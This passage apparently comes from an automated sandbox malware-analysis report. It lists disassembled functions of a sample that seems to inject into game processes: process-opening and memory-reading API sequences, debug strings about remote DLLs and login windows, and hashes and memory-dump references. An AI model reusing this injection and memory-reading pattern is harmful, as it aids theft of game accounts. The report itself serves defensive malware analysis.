                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3A58
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3A7F
                                                                                  • OutputDebugStringA.KERNEL32(before RDTP), ref: 6A6D3A93
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3A9A
                                                                                  • RDTP.A2F0JLEKS(?,?,?), ref: 6A6D3AB0
                                                                                  • _malloc.LIBCMT ref: 6A6D3AD2
                                                                                  • _memset.LIBCMT ref: 6A6D3AE1
                                                                                  • _strncpy.LIBCMT ref: 6A6D3B08
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3B1C
                                                                                  • OutputDebugStringA.KERNEL32(before SendMessage), ref: 6A6D3B30
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3B37
                                                                                  • SendMessageA.USER32(?,000007EB,00000000,00000000), ref: 6A6D3B58
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s$_strncpy$_memset$MessageSend_malloc
                                                                                  • String ID: 996 type;path is:$C:\pl.txt$before RDTP$before SendMessage$in RemoteGameDllZs
                                                                                  • API String ID: 2542873480-2955065797
                                                                                  • Opcode ID: 0a06733782b9b4d1452b12d37d42608cbf415a5c5edde065e67f59703eeeb558
                                                                                  • Instruction ID: 8800b051f197b819b9c9de5ed9df5e213d5b1a569077d4ed0bd38e54117df947
                                                                                  • Opcode Fuzzy Hash: 0a06733782b9b4d1452b12d37d42608cbf415a5c5edde065e67f59703eeeb558
                                                                                  • Instruction Fuzzy Hash: FB51E3B5508300ABE710EB65CC49F9BB7E5AFD5344F0A8828F65487251DF34EA0CCB92
                                                                                  Function 6A6D5160 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 230libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeA), ref: 6A6D51D3
                                                                                  • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoA), ref: 6A6D51E0
                                                                                  • GetProcAddress.KERNEL32(00000000,VerQueryValueA), ref: 6A6D51ED
                                                                                  • _malloc.LIBCMT ref: 6A6D5225
                                                                                  • _memset.LIBCMT ref: 6A6D5298
                                                                                  • wsprintfA.USER32 ref: 6A6D52BA
                                                                                  • _memset.LIBCMT ref: 6A6D52E8
                                                                                  • _sprintf.LIBCMT ref: 6A6D52FC
                                                                                  Strings
                                                                                  • \VarFileInfo\Translation, xrefs: 6A6D5256
                                                                                  • \StringFileInfo\%04x%04x\CompanyName, xrefs: 6A6D534A
                                                                                  • GetFileVersionInfoA, xrefs: 6A6D51D5
                                                                                  • GetFileVersionInfoSizeA, xrefs: 6A6D51CD
                                                                                  • cbDescSize is : %d, xrefs: 6A6D52F6
                                                                                  • \StringFileInfo\%04x%04x\LegalCopyright, xrefs: 6A6D53B3
                                                                                  • \StringFileInfo\%04x%04x\FileDescription, xrefs: 6A6D52B4
                                                                                  • VerQueryValueA, xrefs: 6A6D51E2
                                                                                  • version.dll, xrefs: 6A6D5187
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$_memset$LibraryLoad_malloc_sprintfwsprintf
                                                                                  • String ID: GetFileVersionInfoA$GetFileVersionInfoSizeA$VerQueryValueA$\StringFileInfo\%04x%04x\CompanyName$\StringFileInfo\%04x%04x\FileDescription$\StringFileInfo\%04x%04x\LegalCopyright$\VarFileInfo\Translation$cbDescSize is : %d$version.dll
                                                                                  • API String ID: 668115835-4254682184
                                                                                  • Opcode ID: b3d97fd0d22ec711bc354f66aa3bdaa44220365e49a694811e78ba6fe75dbf36
                                                                                  • Instruction ID: ad661d686207bafd5a099da991cf74b7a5cdcfcf817860b324210243559af837
                                                                                  • Opcode Fuzzy Hash: b3d97fd0d22ec711bc354f66aa3bdaa44220365e49a694811e78ba6fe75dbf36
                                                                                  • Instruction Fuzzy Hash: 2171B0B2108340AFD710EF64CC84DABB7F8EBC9744F054A2DF69597251EB74EA058B62
                                                                                  Function 6A6DBFC0 Relevance: 43.9, APIs: 14, Strings: 11, Instructions: 196COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DBFD6
                                                                                  • OutputDebugStringA.KERNEL32(game type xk........................), ref: 6A6DBFF0
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DBFF7
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC036
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC06E
                                                                                    • Part of subcall function 6A6FE0D8: __fsopen.LIBCMT ref: 6A6FE10E
                                                                                    • Part of subcall function 6A6DB990: OutputDebugStringA.KERNEL32(IsPorcWithTargetClass : login window,75ADA040,6A6DAA32,00000000), ref: 6A6DB998
                                                                                    • Part of subcall function 6A6DB990: OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DB99F
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC0A5
                                                                                  Strings
                                                                                  • game type hero......................, xrefs: 6A6DC12B
                                                                                  • game type gom......................., xrefs: 6A6DC086
                                                                                  • other game type....................., xrefs: 6A6DC1C4
                                                                                  • game type gee......................., xrefs: 6A6DC0F4
                                                                                  • game type blue......................, xrefs: 6A6DC199
                                                                                  • game type ws........................, xrefs: 6A6DC04A
                                                                                  • game type xk........................, xrefs: 6A6DBFEB
                                                                                  • C:\pl.txt, xrefs: 6A6DBFD0, 6A6DC027, 6A6DC1E1
                                                                                  • game type ty........................, xrefs: 6A6DC1FC
                                                                                  • game type leg......................, xrefs: 6A6DC162
                                                                                  • game type dee......................., xrefs: 6A6DC0BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString__wfopen_s$__fsopen
                                                                                  • String ID: C:\pl.txt$game type blue......................$game type dee.......................$game type gee.......................$game type gom.......................$game type hero......................$game type leg......................$game type ty........................$game type ws........................$game type xk........................$other game type.....................
                                                                                  • API String ID: 2578685260-2888131310
                                                                                  • Opcode ID: a0c2beb8e8d00340608c4ebec558574f75bcaf756c379ab44c0cee76470e01b4
                                                                                  • Instruction ID: 01dc2984d6d989ec6c756f73d893f18d876d714574494762d8938965fc9262b3
                                                                                  • Opcode Fuzzy Hash: a0c2beb8e8d00340608c4ebec558574f75bcaf756c379ab44c0cee76470e01b4
                                                                                  • Instruction Fuzzy Hash: 5951F4B6A041146BEB00E6D8A844B8EB3E59B84695F05883DF61AC7252EF31FD1CD7D3
                                                                                  Function 6A6D2F80 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 150sleepwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2FA5
                                                                                  • OutputDebugStringA.KERNEL32(in RemoteGameDllWQ), ref: 6A6D2FBF
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2FC6
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2FF8
                                                                                  • OutputDebugStringA.KERNEL32(not newEngine1 or new Engine2), ref: 6A6D300C
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3013
                                                                                  • _memset.LIBCMT ref: 6A6D3033
                                                                                  • _strncpy.LIBCMT ref: 6A6D3072
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3089
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D309D
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D30A4
                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 6A6D30B8
                                                                                  • MessageBoxA.USER32(00000000,6A71B208,6A71B1FC,00001000), ref: 6A6D30D8
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3105
                                                                                  • OutputDebugStringA.KERNEL32(RemoteLibrary failed), ref: 6A6D3119
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3120
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D313E
                                                                                  • OutputDebugStringA.KERNEL32(sleep if leg or blue), ref: 6A6D3152
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3159
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 6A6D3175
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s$AttributesFileMessageSleep_memset_strncpy
                                                                                  • String ID: C:\pl.txt$RemoteLibrary failed$in RemoteGameDllWQ$not newEngine1 or new Engine2$sleep if leg or blue
                                                                                  • API String ID: 534663367-1936516422
                                                                                  • Opcode ID: 3e68e3ba9629bd660d390984c6ed159002ae4c5829ac394a53605c28efa16e36
                                                                                  • Instruction ID: 29cddbac20637b4d94611981647392395b87039db0bd95a6d99f50c675f8719f
                                                                                  • Opcode Fuzzy Hash: 3e68e3ba9629bd660d390984c6ed159002ae4c5829ac394a53605c28efa16e36
                                                                                  • Instruction Fuzzy Hash: E54193B1408300ABE710EBA58D45F5AB7F5AFD5354F0A8828FA6493251DF74EA0CCB93
                                                                                  Function 0BEA135C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0BEA1365
                                                                                    • Part of subcall function 0BEA1330: GetProcAddress.KERNEL32(00000000), ref: 0BEA1349
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                  • API String ID: 1646373207-1918263038
                                                                                  • Opcode ID: d5e600d5e4125f136983fe4b62f7042162f6e06f518edf2c48572a8a10128ffc
                                                                                  • Instruction ID: 79916579c2d6471ed6e59a5ad20ac6ff4a999af6c1b2dac86a10673b1baf59e0
                                                                                  • Opcode Fuzzy Hash: d5e600d5e4125f136983fe4b62f7042162f6e06f518edf2c48572a8a10128ffc
                                                                                  • Instruction Fuzzy Hash: 9A415DA96152155E03047FAEB80346A7BCED7C6AD1BA1B02AB004FFB40EE30FD41562F
                                                                                  Function 0BEB5AE8 Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 0BEB5B2B
                                                                                  • SelectObject.GDI32(?,?), ref: 0BEB5B40
                                                                                  • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0BEB5BBB,?,?), ref: 0BEB5B8F
                                                                                  • SelectObject.GDI32(?,?), ref: 0BEB5BA9
                                                                                  • DeleteObject.GDI32(?), ref: 0BEB5BB5
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB5BC9
                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0BEB5BEA
                                                                                  • SelectObject.GDI32(?,?), ref: 0BEB5BFF
                                                                                  • SelectPalette.GDI32(?,0E080E34,00000000), ref: 0BEB5C13
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0BEB5C25
                                                                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 0BEB5C3A
                                                                                  • SelectPalette.GDI32(?,0E080E34,000000FF), ref: 0BEB5C50
                                                                                  • RealizePalette.GDI32(?), ref: 0BEB5C5C
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0BEB5C7E
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0BEB5CA0
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0BEB5CA8
                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 0BEB5CB6
                                                                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0BEB5CE2
                                                                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0BEB5D07
                                                                                  • SetTextColor.GDI32(?,?), ref: 0BEB5D11
                                                                                  • SetBkColor.GDI32(?,?), ref: 0BEB5D1B
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB5D2E
                                                                                  • DeleteObject.GDI32(?), ref: 0BEB5D37
                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0BEB5D59
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB5D62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                                  • String ID:
                                                                                  • API String ID: 3976802218-0
                                                                                  • Opcode ID: 8b84ef9260047d5eab9620b0097aa9263cc4fd91ae23f2b116e71ff85b6b760e
                                                                                  • Instruction ID: fbd5555fdbe6b1d3aa02d7010c5b4ab714299c3a6d5f9d11084f61701e9146c4
                                                                                  • Opcode Fuzzy Hash: 8b84ef9260047d5eab9620b0097aa9263cc4fd91ae23f2b116e71ff85b6b760e
                                                                                  • Instruction Fuzzy Hash: 90819CB2A10209AFDF50EFACDD95EEFBBECAB0D610F111554BA18E7240C674AD048B65
                                                                                  Function 6A6DABF0 Relevance: 35.1, APIs: 4, Strings: 16, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6E02D0: _memset.LIBCMT ref: 6A6E0354
                                                                                    • Part of subcall function 6A6E02D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6A6E0366
                                                                                    • Part of subcall function 6A6E02D0: Module32First.KERNEL32 ref: 6A6E0380
                                                                                    • Part of subcall function 6A6E02D0: Module32Next.KERNEL32(00000000,?), ref: 6A6E03D9
                                                                                    • Part of subcall function 6A6E02D0: CloseHandle.KERNEL32(00000000), ref: 6A6E03E3
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6DAC55
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004A0000,?,00040000,?,?,?,?,?,?,?,6A6DD365), ref: 6A6DAC78
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00600000,?,00040000,?,?,?,?,?,?,?,6A6DD365), ref: 6A6DACFF
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6A6DD365), ref: 6A6DAD6F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
